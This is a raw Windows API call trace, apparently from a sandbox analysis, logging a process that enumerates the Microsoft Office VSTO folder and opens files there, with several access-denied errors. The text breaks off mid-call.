[0103.737] GetLastError () returned 0x5 [0103.737] GetLastError () returned 0x5 [0103.737] SetLastError (dwErrCode=0x5) [0103.737] GetLastError () returned 0x5 [0103.737] SetLastError (dwErrCode=0x5) [0103.737] GetLastError () returned 0x5 [0103.738] SetLastError (dwErrCode=0x5) [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0103.738] AreFileApisANSI () returned 1 [0103.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0103.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0103.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 57 [0103.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.738] GetLastError () returned 0x5 [0103.738] GetLastError () returned 0x5 [0103.738] SetLastError (dwErrCode=0x5) [0103.738] GetLastError () returned 0x5 [0103.738] SetLastError (dwErrCode=0x5) [0103.738] GetLastError () returned 0x5 [0103.738] SetLastError (dwErrCode=0x5) [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0103.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0103.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0103.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0103.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0103.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0103.739] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0103.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0103.739] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0103.740] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4aebd53e, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.740] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4a6fdac8, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0103.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0103.740] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.740] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.740] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.740] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0103.740] AreFileApisANSI () returned 1 [0103.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", lpUsedDefaultChar=0x0) returned 62 [0103.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0103.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.741] AreFileApisANSI () returned 1 [0103.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0103.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 62 [0103.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.741] GetLastError () returned 0x5 [0103.741] GetLastError () returned 0x5 [0103.741] SetLastError (dwErrCode=0x5) [0103.741] GetLastError () returned 0x5 [0103.741] SetLastError (dwErrCode=0x5) [0103.741] GetLastError () returned 0x5 [0103.741] SetLastError (dwErrCode=0x5) [0103.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0103.741] AreFileApisANSI () returned 1 [0103.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0103.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 62 [0103.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.742] GetLastError () returned 0x5 [0103.742] GetLastError () returned 0x5 [0103.742] SetLastError (dwErrCode=0x5) [0103.742] GetLastError () returned 0x5 [0103.742] SetLastError (dwErrCode=0x5) [0103.742] GetLastError () returned 0x5 [0103.742] SetLastError (dwErrCode=0x5) [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0103.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0103.742] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0103.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0103.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0103.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0103.743] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78310 [0103.744] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4a6fdac8, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.745] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6d7a0a, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x30a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0103.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0103.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0103.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.746] AreFileApisANSI () returned 1 [0103.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", lpUsedDefaultChar=0x0) returned 82 [0103.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0103.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.746] AreFileApisANSI () returned 1 [0103.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f2c8 [0103.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.747] GetFileType (hFile=0x368) returned 0x1 [0103.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.747] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0103.747] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0103.747] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0103.747] CloseHandle (hObject=0x368) returned 1 [0103.747] AreFileApisANSI () returned 1 [0103.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f428 [0103.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.748] GetFileType (hFile=0x368) returned 0x1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.748] CloseHandle (hObject=0x368) returned 1 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.748] RtlAllocateHeap 